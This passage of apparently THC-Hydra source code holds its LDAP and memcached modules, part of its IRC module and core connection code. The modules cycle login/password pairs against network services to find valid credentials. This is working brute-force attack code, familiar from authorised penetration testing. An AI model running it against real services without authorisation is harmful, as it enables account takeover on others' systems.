*/\n if (verbose)\n hydra_report(stderr, \"[ERROR] Erroneous nickname\\n\");\n hydra_child_exit(0);\n }\n\n if ((ret > 0) && (strstr(buffer, \" 433 \") != NULL)) {\n /* :irc.debian.org 433 * hydra :Nickname already in use */\n if (verbose)\n hydra_report(stderr, \"[ERROR] Nickname already in use\\n\");\n hydra_child_exit(0);\n }\n\n /* ERROR :Bad password is returned from ngircd when it s waiting for a\n * server password */\n if ((ret > 0) && (strstr(buffer, \" 001 \") == NULL)) {\n /* seems we not successfully connected */\n hydra_report(stderr,\n \"[ERROR] should not be able to identify server msg, \"\n \"please report it\\n%s\\n\",\n buffer);\n hydra_child_exit(0);\n }\n\n next_run = 2;\n break;\n case 2: /* run the cracking function */\n next_run = start_oper_irc(sock, ip, port, options, miscptr, fp);\n break;\n case 3: /* clean exit */\n if (sock >= 0)\n sock = hydra_disconnect(sock);\n hydra_child_exit(0);\n return;\n case 4:\n next_run = start_pass_irc(sock, ip, port, options, miscptr, fp, hostname);\n break;\n default:\n hydra_report(stderr, \"[ERROR] Caught unknown return code, exiting!\\n\");\n hydra_child_exit(2);\n }\n run = next_run;\n }\n}\n\nint32_t service_irc_init(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname) {\n // called before the childrens are forked off, so this is the function\n // which should be filled if initial connections and service setup has to be\n // performed once only.\n //\n // fill if needed.\n //\n // return codes:\n // 0 all OK\n // -1 error, hydra will exit, so print a good error message here\n\n return 0;\n}\n\nvoid usage_irc(const char *service) {\n printf(\"Module irc is optionally taking the general server password, if the \"\n \"server is requiring one, and if none is passed the password from \"\n \"-p/-P will be used\\n\\n\");\n}\n" }, { "path": "hydra-ldap.c", "content": "#include \"hydra-mod.h\"\n#include \"sasl.h\"\n\nextern char *HYDRA_EXIT;\n\nunsigned char *buf;\nint32_t counter;\nint32_t tls_required = 0;\n\nint32_t start_ldap(int32_t s, char *ip, int32_t port, unsigned char options, char *miscptr, FILE *fp, char *hostname, char version, int32_t auth_method) {\n char *empty = \"\", *result = NULL;\n char *login = \"\", *pass, *fooptr = \"\";\n unsigned char buffer[512];\n int32_t length = 0;\n int32_t ldap_auth_mechanism = auth_method;\n\n /*\n The LDAP \"simple\" method has three modes of operation:\n * anonymous= no user no pass\n * unauthenticated= user but no pass\n * user/password authenticated= user and pass\n */\n\n if ((miscptr != NULL) && (ldap_auth_mechanism == AUTH_CLEAR)) {\n login = miscptr;\n } else {\n if (strlen(login = hydra_get_next_login()) == 0)\n login = empty;\n }\n if (miscptr == NULL)\n miscptr = fooptr;\n\n if (strlen(pass = hydra_get_next_password()) == 0)\n pass = empty;\n\n switch (ldap_auth_mechanism) {\n case AUTH_CLEAR:\n length = 14 + strlen(login) + strlen(pass);\n break;\n#ifdef LIBOPENSSL\n case AUTH_CRAMMD5:\n length = 14 + strlen(miscptr) + strlen(\"CRAM-MD5\") + 2;\n break;\n case AUTH_DIGESTMD5:\n length = 14 + strlen(miscptr) + strlen(\"DIGEST-MD5\") + 2;\n break;\n#endif\n }\n\n memset(buffer, 0, sizeof(buffer));\n buffer[0] = 48;\n buffer[1] = length - 2;\n\n buffer[2] = 2;\n buffer[3] = 1;\n buffer[4] = counter % 256;\n\n buffer[5] = 96;\n buffer[6] = length - 7;\n buffer[7] = 2;\n buffer[8] = 1;\n buffer[9] = version;\n buffer[10] = 4;\n\n if (ldap_auth_mechanism == AUTH_CLEAR) {\n buffer[11] = strlen(login); /* DN */\n memcpy(&buffer[12], login, strlen(login));\n buffer[12 + strlen(login)] = (unsigned char)128;\n buffer[13 + strlen(login)] = strlen(pass);\n memcpy(&buffer[14 + strlen(login)], pass, strlen(pass)); /* PASS */\n } else {\n char *authm = \"DIGEST-MD5\";\n\n if (ldap_auth_mechanism == AUTH_CRAMMD5) {\n authm = \"CRAM-MD5\";\n }\n\n if ((strlen(miscptr)) > sizeof(buffer) - 16 - strlen(authm)) {\n miscptr[sizeof(buffer) - 16 - strlen(authm)] = '\\0';\n }\n\n buffer[11] = strlen(miscptr); /* DN */\n memcpy(&buffer[12], miscptr, strlen(miscptr));\n buffer[12 + strlen(miscptr)] = 163;\n buffer[13 + strlen(miscptr)] = 2 + strlen(authm);\n buffer[14 + strlen(miscptr)] = 4;\n buffer[15 + strlen(miscptr)] = strlen(authm);\n memcpy(&buffer[16 + strlen(miscptr)], authm, strlen(authm));\n }\n if (hydra_send(s, (char *)buffer, length, 0) < 0)\n return 1;\n if ((buf = (unsigned char *)hydra_receive_line(s)) == NULL)\n return 1;\n\n if (buf[0] != 0 && buf[0] != 32 && buf[9] == 2) {\n if (verbose)\n hydra_report(stderr, \"[VERBOSE] Protocol invalid\\n\");\n free(buf);\n return 3;\n }\n\n if (buf[0] != 0 && buf[0] != 32 && buf[9] == 13) {\n if (verbose)\n hydra_report(stderr, \"[VERBOSE] Confidentiality required, TLS has to be enabled\\n\");\n tls_required = 1;\n free(buf);\n return 1;\n }\n\n if ((buf[0] != 0 && buf[0] != 32) && buf[9] == 34) {\n hydra_report(stderr, \"[ERROR] Invalid DN Syntax\\n\");\n hydra_child_exit(2);\n free(buf);\n return 3;\n }\n#ifdef LIBOPENSSL\n\n /* one more step auth for CRAM and DIGEST */\n if (ldap_auth_mechanism == AUTH_CRAMMD5) {\n /* get the challenge, need to extract it */\n char *ptr;\n char buf2[32];\n\n ptr = strstr((char *)buf, \"<\");\n fooptr = buf2;\n result = sasl_cram_md5(fooptr, pass, ptr);\n if (result == NULL)\n return 1;\n counter++;\n if (strstr(miscptr, \"^USER^\") != NULL) {\n miscptr = hydra_strrep(miscptr, \"^USER^\", login);\n }\n\n length = 12 + strlen(miscptr) + 4 + strlen(\"CRAM-MD5\") + 2 + strlen(login) + 1 + strlen(buf2);\n\n memset(buffer, 0, sizeof(buffer));\n buffer[0] = 48;\n buffer[1] = length - 2;\n\n buffer[2] = 2;\n buffer[3] = 1;\n buffer[4] = counter % 256;\n\n buffer[5] = 96;\n buffer[6] = length - 7;\n buffer[7] = 2;\n buffer[8] = 1;\n buffer[9] = version;\n buffer[10] = 4;\n\n buffer[11] = strlen(miscptr); /* DN */\n memcpy(&buffer[12], miscptr, strlen(miscptr));\n buffer[12 + strlen(miscptr)] = 163;\n buffer[13 + strlen(miscptr)] = 2 + strlen(\"CRAM-MD5\") + 2 + strlen(login) + 1 + strlen(buf2);\n buffer[14 + strlen(miscptr)] = 4;\n buffer[15 + strlen(miscptr)] = strlen(\"CRAM-MD5\");\n memcpy(&buffer[16 + strlen(miscptr)], \"CRAM-MD5\", strlen(\"CRAM-MD5\"));\n buffer[16 + strlen(miscptr) + strlen(\"CRAM-MD5\")] = 4;\n buffer[17 + strlen(miscptr) + strlen(\"CRAM-MD5\")] = strlen(login) + 1 + strlen(buf2);\n memcpy(&buffer[18 + strlen(miscptr) + strlen(\"CRAM-MD5\")], login, strlen(login));\n buffer[18 + strlen(miscptr) + strlen(\"CRAM-MD5\") + strlen(login)] = ' ';\n memcpy(&buffer[18 + strlen(miscptr) + strlen(\"CRAM-MD5\") + strlen(login) + 1], buf2, strlen(buf2));\n\n if (hydra_send(s, (char *)buffer, length, 0) < 0)\n return 1;\n free(buf);\n if ((buf = (unsigned char *)hydra_receive_line(s)) == NULL)\n return 1;\n } else {\n if (ldap_auth_mechanism == AUTH_DIGESTMD5) {\n char *ptr;\n char buffer2[500];\n int32_t ind = 0;\n\n ptr = strstr((char *)buf, \"realm=\");\n\n counter++;\n if (strstr(miscptr, \"^USER^\") != NULL) {\n miscptr = hydra_strrep(miscptr, \"^USER^\", login);\n }\n\n fooptr = buffer2;\n result = sasl_digest_md5(fooptr, login, pass, ptr, miscptr, \"ldap\", NULL, 0, NULL);\n if (result == NULL) {\n free(buf);\n return 3;\n }\n\n length = 26 + strlen(miscptr) + strlen(\"DIGEST-MD5\") + strlen(buffer2);\n\n memset(buffer, 0, sizeof(buffer));\n ind = 0;\n buffer[ind] = 48;\n ind++;\n buffer[ind] = 130;\n ind++;\n\n if (length - 4 > 255) {\n buffer[ind] = 1;\n ind++;\n buffer[ind] = length - 256 - 4;\n ind++;\n } else {\n buffer[ind] = 0;\n ind++;\n buffer[ind] = length - 4;\n ind++;\n }\n\n buffer[ind] = 2;\n ind++;\n buffer[ind] = 1;\n ind++;\n buffer[ind] = counter % 256;\n ind++;\n buffer[ind] = 96; /*0x60 */\n ind++;\n buffer[ind] = 130;\n ind++;\n if (length - 7 - 4 > 255) {\n buffer[ind] = 1;\n ind++;\n buffer[ind] = length - 256 - 11;\n ind++;\n } else {\n buffer[ind] = 0;\n ind++;\n buffer[ind] = length - 11;\n ind++;\n }\n\n buffer[ind] = 2;\n ind++;\n buffer[ind] = 1;\n ind++;\n buffer[ind] = version;\n ind++;\n buffer[ind] = 4;\n ind++;\n buffer[ind] = strlen(miscptr);\n ind++;\n memcpy(&buffer[ind], miscptr, strlen(miscptr));\n /*DN*/ buffer[ind + strlen(miscptr)] = 163; // 0xa3\n ind++;\n buffer[ind + strlen(miscptr)] = 130; // 0x82\n ind++;\n\n if (strlen(buffer2) + 6 + strlen(\"DIGEST-MD5\") > 255) {\n buffer[ind + strlen(miscptr)] = 1;\n ind++;\n buffer[ind + strlen(miscptr)] = strlen(buffer2) + 6 + strlen(\"DIGEST-MD5\") - 256;\n } else {\n buffer[ind + strlen(miscptr)] = 0;\n ind++;\n buffer[ind + strlen(miscptr)] = strlen(buffer2) + 6 + strlen(\"DIGEST-MD5\");\n }\n ind++;\n\n buffer[ind + strlen(miscptr)] = 4;\n ind++;\n buffer[ind + strlen(miscptr)] = strlen(\"DIGEST-MD5\");\n ind++;\n memcpy(&buffer[ind + strlen(miscptr)], \"DIGEST-MD5\", strlen(\"DIGEST-MD5\"));\n buffer[ind + strlen(miscptr) + strlen(\"DIGEST-MD5\")] = 4;\n ind++;\n buffer[ind + strlen(miscptr) + strlen(\"DIGEST-MD5\")] = 130;\n ind++;\n\n if (strlen(buffer2) > 255) {\n buffer[ind + strlen(miscptr) + strlen(\"DIGEST-MD5\")] = 1;\n ind++;\n buffer[ind + strlen(miscptr) + strlen(\"DIGEST-MD5\")] = strlen(buffer2) - 256;\n } else {\n buffer[ind + strlen(miscptr) + strlen(\"DIGEST-MD5\")] = 0;\n ind++;\n buffer[ind + strlen(miscptr) + strlen(\"DIGEST-MD5\")] = strlen(buffer2);\n }\n ind++;\n memcpy(&buffer[ind + strlen(miscptr) + strlen(\"DIGEST-MD5\")], buffer2, strlen(buffer2));\n ind++;\n\n if (hydra_send(s, (char *)buffer, length, 0) < 0)\n return 1;\n free(buf);\n if ((buf = (unsigned char *)hydra_receive_line(s)) == NULL)\n return 1;\n }\n }\n#endif\n\n /* success is: 0a 01 00 - failure is: 0a 01 31 */\n if ((buf[0] != 0 && buf[9] == 0) || (buf[0] != 32 && buf[9] == 32)) {\n hydra_report_found_host(port, ip, \"ldap\", fp);\n hydra_completed_pair_found();\n free(buf);\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return 3;\n return 1;\n }\n\n if ((buf[0] != 0 && buf[0] != 32) && buf[9] == 7) {\n hydra_report(stderr, \"[ERROR] Unknown authentication method\\n\");\n free(buf);\n hydra_child_exit(2);\n }\n\n if ((buf[0] != 0 && buf[0] != 32) && buf[9] == 53) {\n if (verbose)\n hydra_report(stderr,\n \"[VERBOSE] Server unwilling to perform action, maybe deny by server \"\n \"config or too busy when tried login: %s password: %s\\n\",\n login, pass);\n free(buf);\n return 1;\n }\n\n if ((buf[0] != 0 && buf[0] != 32) && buf[9] == 2) {\n hydra_report(stderr,\n \"[ERROR] Invalid protocol version, you tried ldap%c, better \"\n \"try ldap%c\\n\",\n version + '0', version == 2 ? '3' : '2');\n free(buf);\n hydra_child_exit(2);\n sleep(1);\n hydra_child_exit(2);\n }\n // 0 0x30, 0x84, 0x20, 0x20, 0x20, 0x10, 0x02, 0x01,\n // 8 0x01, 0x61, 0x84, 0x20, 0x20, 0x20, 0x07, 0x0a,\n // 16 0x01, 0x20, 0x04, 0x20, 0x04, 0x20, 0x00, 0x00,\n\n // this is for w2k8 active directory ldap auth\n if (buf[0] == 48 && buf[1] == 132) {\n if (buf[9] == 0x61 && buf[1] == 0x84) {\n if (buf[17] == 0 || buf[17] == 0x20) {\n hydra_report_found_host(port, ip, \"ldap\", fp);\n hydra_completed_pair_found();\n free(buf);\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return 3;\n return 1;\n }\n }\n } else {\n if (buf[9] != 49 && buf[9] != 2 && buf[9] != 53) {\n hydra_report(stderr, \"[ERROR] Uh, unknown LDAP response! Please report this: \\n\");\n print_hex((unsigned char *)buf, 24);\n free(buf);\n return 3;\n }\n }\n\n hydra_completed_pair();\n free(buf);\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return 3;\n return 2;\n}\n\nvoid service_ldap(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname, char version, int32_t auth_method) {\n int32_t run = 1, next_run = 1, sock = -1;\n int32_t myport = PORT_LDAP, mysslport = PORT_LDAP_SSL;\n\n hydra_register_socket(sp);\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return;\n while (1) {\n switch (run) {\n case 1: /* connect and service init function */\n if (sock >= 0)\n sock = hydra_disconnect(sock);\n // usleepn(275);\n if ((options & OPTION_SSL) == 0) {\n if (port != 0)\n myport = port;\n sock = hydra_connect_tcp(ip, myport);\n port = myport;\n } else {\n if (port != 0)\n mysslport = port;\n sock = hydra_connect_ssl(ip, mysslport, hostname);\n port = mysslport;\n }\n if (sock < 0) {\n if (verbose || debug)\n hydra_report(stderr, \"[ERROR] Child with pid %d terminating, can not connect\\n\", (int32_t)getpid());\n hydra_child_exit(1);\n }\n counter = 1;\n if (tls_required) {\n /* Start TLS operation OID = 1.3.6.1.4.1.1466.20037 according to RFC\n * 2830 */\n char confidentiality_required[] = \"\\x30\\x1d\\x02\\x01\\x01\\x77\\x18\\x80\\x16\\x31\\x2e\\x33\\x2e\\x36\\x2e\\x31\"\n \"\\x2e\\x34\\x2e\\x31\\x2e\\x31\\x34\\x36\\x36\\x2e\\x32\\x30\\x30\\x33\\x37\";\n\n if (hydra_send(sock, confidentiality_required, strlen(confidentiality_required), 0) < 0)\n hydra_child_exit(1);\n\n if ((buf = (unsigned char *)hydra_receive_line(sock)) == NULL)\n hydra_child_exit(1);\n\n if ((buf[0] != 0 && buf[9] == 0) || (buf[0] != 32 && buf[9] == 32)) {\n /* TLS option negociation goes well, now trying to connect */\n free(buf);\n if ((hydra_connect_to_ssl(sock, hostname) == -1) && verbose) {\n hydra_report(stderr, \"[ERROR] Can't use TLS\\n\");\n hydra_child_exit(1);\n } else {\n if (verbose)\n hydra_report(stderr, \"[VERBOSE] TLS connection done\\n\");\n counter++;\n }\n } else {\n hydra_report(stderr, \"[ERROR] Can't use TLS %s\\n\", buf);\n free(buf);\n hydra_child_exit(1);\n }\n }\n next_run = 2;\n break;\n case 2: /* run the cracking function */\n next_run = start_ldap(sock, ip, port, options, miscptr, fp, hostname, version, auth_method);\n counter++;\n break;\n case 3: /* clean exit */\n if (sock >= 0)\n sock = hydra_disconnect(sock);\n hydra_child_exit(0);\n return;\n default:\n hydra_report(stderr, \"[ERROR] Caught unknown return code, exiting!\\n\");\n hydra_child_exit(2);\n }\n run = next_run;\n }\n}\n\nvoid service_ldap2(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname) { service_ldap(ip, sp, options, miscptr, fp, port, hostname, 2, AUTH_CLEAR); }\n\nvoid service_ldap3(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname) { service_ldap(ip, sp, options, miscptr, fp, port, hostname, 3, AUTH_CLEAR); }\n\nvoid service_ldap3_cram_md5(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname) { service_ldap(ip, sp, options, miscptr, fp, port, hostname, 3, AUTH_CRAMMD5); }\n\nvoid service_ldap3_digest_md5(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname) { service_ldap(ip, sp, options, miscptr, fp, port, hostname, 3, AUTH_DIGESTMD5); }\n\nint32_t service_ldap_init(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname) {\n // called before the childrens are forked off, so this is the function\n // which should be filled if initial connections and service setup has to be\n // performed once only.\n //\n // fill if needed.\n //\n // return codes:\n // 0 all OK\n // -1 error, hydra will exit, so print a good error message here\n if (miscptr != NULL && strlen(miscptr) > 220) {\n fprintf(stderr, \"[ERROR] the option string to this module may not be \"\n \"larger than 220 bytes\\n\");\n return -1;\n }\n\n return 0;\n}\n\nvoid usage_ldap(const char *service) {\n printf(\"Module %s is optionally taking the DN (depending of the auth method \"\n \"choosed\\n\"\n \"Note: you can also specify the DN as login when Simple auth method \"\n \"is used).\\n\"\n \"The keyword \\\"^USER^\\\" is replaced with the login.\\n\"\n \"Special notes for Simple method has 3 operation modes: anonymous, \"\n \"(no user no pass),\\n\"\n \"unauthenticated (user but no pass), user/pass authenticated (user \"\n \"and pass).\\n\"\n \"So don't forget to set empty string as user/pass to test all modes.\\n\"\n \"Hint: to authenticate to a windows active directory ldap, this is \"\n \"usually\\n\"\n \" cn=^USER^,cn=users,dc=foo,dc=bar,dc=com for domain foo.bar.com\\n\\n\",\n service);\n}\n" }, { "path": "hydra-logo.rc", "content": "1 ICON \"hydra-logo.ico\"\r\n" }, { "path": "hydra-memcached.c", "content": "// This plugin was written by \n// Tested on memcached 1.5.6-0ubuntu1\n\n#ifdef LIBMCACHED\n#include \n#endif\n\n#include \"hydra-mod.h\"\n\n#ifndef LIBMCACHED\nvoid dummy_mcached() { printf(\"\\n\"); }\n#else\n\nextern int32_t hydra_data_ready_timed(int32_t socket, long sec, long usec);\n\nextern hydra_option hydra_options;\nextern char *HYDRA_EXIT;\n\nint mcached_send_com_quit(int32_t sock) {\n char *com_quit = \"quit\\r\\n\";\n\n if (hydra_send(sock, com_quit, strlen(com_quit), 0) < 0)\n return 1;\n return 0;\n}\n\nint mcached_send_com_version(int32_t sock) {\n char *com_version = \"version\\r\\n\";\n\n if (hydra_send(sock, com_version, strlen(com_version), 0) < 0)\n return 1;\n return 0;\n}\n\nint32_t start_mcached(int32_t s, char *ip, int32_t port, unsigned char options, char *miscptr, FILE *fp) {\n char *empty = \"\";\n char *login, *pass;\n\n memcached_server_st *servers = NULL;\n memcached_return_t rc;\n memcached_st *cache;\n\n if (strlen(login = hydra_get_next_login()) == 0)\n login = empty;\n if (strlen(pass = hydra_get_next_password()) == 0)\n pass = empty;\n\n cache = memcached_create(NULL);\n\n rc = memcached_set_sasl_auth_data(cache, login, pass);\n if (rc != MEMCACHED_SUCCESS) {\n if (verbose)\n hydra_report(stderr, \"[ERROR] Couldn't setup SASL auth: %s\\n\", memcached_strerror(cache, rc));\n memcached_free(cache);\n return 3;\n }\n\n rc = memcached_behavior_set(cache, MEMCACHED_BEHAVIOR_BINARY_PROTOCOL, 1);\n if (rc != MEMCACHED_SUCCESS) {\n if (verbose)\n hydra_report(stderr, \"[ERROR] Couldn't use the binary protocol: %s\\n\", memcached_strerror(cache, rc));\n memcached_destroy_sasl_auth_data(cache);\n memcached_free(cache);\n return 3;\n }\n rc = memcached_behavior_set(cache, MEMCACHED_BEHAVIOR_CONNECT_TIMEOUT, 10000);\n if (rc != MEMCACHED_SUCCESS) {\n if (verbose)\n hydra_report(stderr, \"[ERROR] Couldn't set the connect timeout: %s\\n\", memcached_strerror(cache, rc));\n memcached_destroy_sasl_auth_data(cache);\n memcached_free(cache);\n return 3;\n }\n\n servers = memcached_server_list_append(servers, hydra_address2string(ip), port, &rc);\n rc = memcached_server_push(cache, servers);\n if (rc != MEMCACHED_SUCCESS) {\n if (verbose)\n hydra_report(stderr, \"[ERROR] Couldn't add server: %s\\n\", memcached_strerror(cache, rc));\n memcached_destroy_sasl_auth_data(cache);\n memcached_free(cache);\n return 3;\n }\n\n rc = memcached_stat_execute(cache, \"\", NULL, NULL);\n if (rc != MEMCACHED_SUCCESS) {\n if (verbose)\n hydra_report(stderr, \"[ERROR] Couldn't get server stats: %s\\n\", memcached_strerror(cache, rc));\n memcached_destroy_sasl_auth_data(cache);\n memcached_free(cache);\n hydra_completed_pair_skip();\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0) {\n return 3;\n }\n return 2;\n }\n\n memcached_destroy_sasl_auth_data(cache);\n memcached_free(cache);\n\n hydra_report_found_host(port, ip, \"memcached\", fp);\n hydra_completed_pair_found();\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return 3;\n\n return 2;\n}\n\nvoid service_mcached(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname) {\n int32_t run = 1, next_run = 1, sock = -1;\n\n hydra_register_socket(sp);\n\n while (1) {\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return;\n\n switch (run) {\n case 1:\n next_run = start_mcached(sock, ip, port, options, miscptr, fp);\n if (next_run == 1 && hydra_options.conwait)\n sleep(hydra_options.conwait);\n break;\n case 2:\n hydra_child_exit(0);\n return;\n default:\n if (!verbose)\n hydra_report(stderr, \"[ERROR] Caught unknown return code, try verbose \"\n \"option for more details\\n\");\n hydra_child_exit(2);\n }\n run = next_run;\n }\n}\n\nint32_t service_mcached_init(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname) {\n // called before the childrens are forked off, so this is the function\n // which should be filled if initial connections and service setup has to be\n // performed once only.\n\n int32_t sock = -1;\n int32_t myport = PORT_MCACHED;\n char *buf;\n\n if (port != 0)\n myport = port;\n\n sock = hydra_connect_tcp(ip, myport);\n if (sock < 0) {\n if (verbose || debug)\n hydra_report(stderr, \"[ERROR] Can not connect\\n\");\n return -1;\n }\n\n if (mcached_send_com_version(sock)) {\n if (verbose || debug)\n hydra_report(stderr, \"[ERROR] Can not send request\\n\");\n return -1;\n }\n\n if (hydra_data_ready_timed(sock, 0, 1000) > 0) {\n buf = hydra_receive_line(sock);\n if (strstr(buf, \"VERSION \")) {\n hydra_report_found_host(port, ip, \"memcached\", fp);\n mcached_send_com_quit(sock);\n if (sock >= 0)\n sock = hydra_disconnect(sock);\n hydra_report(stderr, \"[ERROR] Memcached server does not require any authentication\\n\");\n }\n free(buf);\n return -1;\n }\n if (sock >= 0)\n sock = hydra_disconnect(sock);\n return 0;\n}\n\n#endif\n" }, { "path": "hydra-mod.c", "content": "#include \"hydra-mod.h\"\n#include \n#ifdef LIBOPENSSL\n#include \n#include \n#include \n#include \n#endif\n#ifdef HAVE_PCRE\n#define PCRE2_CODE_UNIT_WIDTH 8\n#include \n#endif\n\n#define MAX_CONNECT_RETRY 1\n#define WAIT_BETWEEN_CONNECT_RETRY 3\n#define HYDRA_DUMP_ROWS 16\n\n/* rfc 1928 SOCKS proxy */\n#define SOCKS_V5 5\n#define SOCKS_V4 4\n#define SOCKS_NOAUTH 0\n\n/* http://tools.ietf.org/html/rfc1929 */\n#define SOCKS_PASSAUTH 2\n#define SOCKS_NOMETHOD 0xff\n#define SOCKS_CONNECT 1\n#define SOCKS_IPV4 1\n#define SOCKS_DOMAIN 3\n#define SOCKS_IPV6 4\n\nextern int32_t conwait;\nchar quiet;\nint32_t do_retry = 1;\nint32_t module_auth_type = -1;\nint32_t intern_socket, extern_socket;\nchar pair[260];\nchar *HYDRA_EXIT = \"\\x00\\xff\\x00\\xff\\x00\";\nchar *HYDRA_EMPTY = \"\\x00\\x00\\x00\\x00\";\nchar *fe80 = \"\\xfe\\x80\\x00\";\nint32_t fail = 0;\nint32_t alarm_went_off = 0;\nint32_t use_ssl = 0;\nchar ipaddr_str[64];\nint32_t src_port = 0;\nint32_t __fck = 0;\nint32_t ssl_first = 1;\nint32_t __first_connect = 1;\nchar ipstring[64];\nuint32_t colored_output = 1;\nchar quiet = 0;\nint32_t old_ssl = 0;\n\n#ifdef LIBOPENSSL\nSSL *ssl = NULL;\nSSL_CTX *sslContext = NULL;\nRSA *rsa = NULL;\n#endif\n\n/* prototype */\nint32_t my_select(int32_t fd, fd_set *fdread, fd_set *fdwrite, fd_set *fdex, long sec, long usec);\n\n/* ----------------- alarming functions ---------------- */\nvoid alarming(int signal) {\n (signal);\n fail++;\n alarm_went_off++;\n\n /* uh, I think it's not good for performance if we try to reconnect to a\n * timeout system! if (fail > MAX_CONNECT_RETRY) {\n */\n // fprintf(stderr, \"Process %d: Can not connect [timeout], process exiting\\n\",\n // (int32_t) getpid());\n if (debug)\n printf(\"DEBUG_CONNECT_TIMEOUT\\n\");\n hydra_child_exit(1);\n\n /*\n * } else {\n * if (verbose) fprintf(stderr, \"Process %d: Can not connect [timeout],\n * retrying (%d of %d retries)\\n\", (int32_t)getpid(), fail,\n * MAX_CONNECT_RETRY);\n * }\n */\n}\n\nvoid interrupt() {\n if (debug)\n printf(\"DEBUG_INTERRUPTED\\n\");\n}\n\n/* ----------------- internal functions ----------------- */\n\nint32_t internal__hydra_connect(char *host, int32_t port, int32_t type, int32_t protocol) {\n int32_t s, ret = -1, ipv6 = 0, reset_selected = 0;\n\n#ifdef AF_INET6\n struct sockaddr_in6 target6;\n struct sockaddr_in6 sin6;\n#endif\n struct sockaddr_in target;\n struct sockaddr_in sin;\n char *buf, *tmpptr = NULL;\n int32_t err = 0;\n\n if (proxy_count > 0 && use_proxy > 0 && selected_proxy == -1) {\n reset_selected = 1;\n selected_proxy = random() % proxy_count;\n }\n\n memset(&target, 0, sizeof(target));\n memset(&sin, 0, sizeof(sin));\n#ifdef AF_INET6\n memset(&target6, 0, sizeof(target6));\n memset(&sin6, 0, sizeof(sin6));\n if ((host[0] == 16 && proxy_string_ip[selected_proxy][0] != 4) || proxy_string_ip[selected_proxy][0] == 16)\n ipv6 = 1;\n#endif\n\n#ifdef AF_INET6\n if (ipv6)\n s = socket(AF_INET6, type, protocol);\n else\n#endif\n s = socket(PF_INET, type, protocol);\n if (s >= 0) {\n if (src_port != 0) {\n int32_t bind_ok = 0;\n\n#ifdef AF_INET6\n if (ipv6) {\n sin6.sin6_family = AF_INET6;\n sin6.sin6_port = htons(src_port);\n } else\n#endif\n {\n sin.sin_family = PF_INET;\n sin.sin_port = htons(src_port);\n sin.sin_addr.s_addr = INADDR_ANY;\n }\n\n // we will try to find a free port down to 512\n while (!bind_ok && src_port >= 512) {\n#ifdef AF_INET6\n if (ipv6)\n ret = bind(s, (struct sockaddr *)&sin6, sizeof(sin6));\n else\n#endif\n ret = bind(s, (struct sockaddr *)&sin, sizeof(sin));\n\n if (ret == -1) {\n if (verbose)\n perror(\"internal_hydra_connect error\");\n if (errno == EADDRINUSE) {\n src_port--;\n#ifdef AF_INET6\n if (ipv6)\n sin6.sin6_port = htons(src_port);\n else\n#endif\n sin.sin_port = htons(src_port);\n } else {\n if (errno == EACCES && (getuid() > 0)) {\n fprintf(stderr, \"[ERROR] You need to be root to test this service\\n\");\n close(s);\n if (reset_selected)\n selected_proxy = -1;\n return -1;\n }\n }\n } else\n bind_ok = 1;\n }\n }\n if (use_proxy > 0 && proxy_count > 0) {\n if (proxy_string_ip[selected_proxy][0] == 4) {\n memcpy(&target.sin_addr.s_addr, &proxy_string_ip[selected_proxy][1], 4);\n target.sin_family = AF_INET;\n target.sin_port = htons(proxy_string_port[selected_proxy]);\n }\n#ifdef AF_INET6\n if (proxy_string_ip[selected_proxy][0] == 16) {\n memcpy(&target6.sin6_addr, &proxy_string_ip[selected_proxy][1], 16);\n target6.sin6_family = AF_INET6;\n target6.sin6_port = htons(proxy_string_port[selected_proxy]);\n }\n#endif\n } else {\n if (host[0] == 4) {\n memcpy(&target.sin_addr.s_addr, &host[1], 4);\n target.sin_family = AF_INET;\n target.sin_port = htons(port);\n }\n#ifdef AF_INET6\n if (host[0] == 16) {\n memcpy(&target6.sin6_addr, &host[1], 16);\n target6.sin6_family = AF_INET6;\n target6.sin6_port = htons(port);\n }\n#endif\n }\n signal(SIGALRM, alarming);\n do {\n if (fail > 0)\n sleep(WAIT_BETWEEN_CONNECT_RETRY);\n alarm_went_off = 0;\n alarm(waittime);\n#ifdef AF_INET6\n#ifdef SO_BINDTODEVICE\n if (host[17] != 0) {\n setsockopt(s, SOL_SOCKET, SO_BINDTODEVICE, &host[17], strlen(&host[17]) + 1);\n }\n#else\n#ifdef IP_FORCE_OUT_IFP\n if (host[17] != 0) {\n setsockopt(s, SOL_SOCKET, IP_FORCE_OUT_IFP, &host[17], strlen(&host[17]) + 1);\n }\n#endif\n#endif\n\n if (ipv6)\n ret = connect(s, (struct sockaddr *)&target6, sizeof(target6));\n else\n#endif\n ret = connect(s, (struct sockaddr *)&target, sizeof(target));\n alarm(0);\n if (ret < 0 && alarm_went_off == 0) {\n fail++;\n if (verbose) {\n if (do_retry && fail <= MAX_CONNECT_RETRY)\n fprintf(stderr,\n \"Process %d: Can not connect [unreachable], retrying (%d \"\n \"of %d retries)\\n\",\n (int32_t)getpid(), fail, MAX_CONNECT_RETRY);\n else\n fprintf(stderr, \"Process %d: Can not connect [unreachable]\\n\", (int32_t)getpid());\n }\n }\n } while (ret < 0 && fail <= MAX_CONNECT_RETRY && do_retry);\n if (ret < 0 && fail > MAX_CONNECT_RETRY) {\n if (debug)\n printf(\"DEBUG_CONNECT_UNREACHABLE\\n\");\n\n 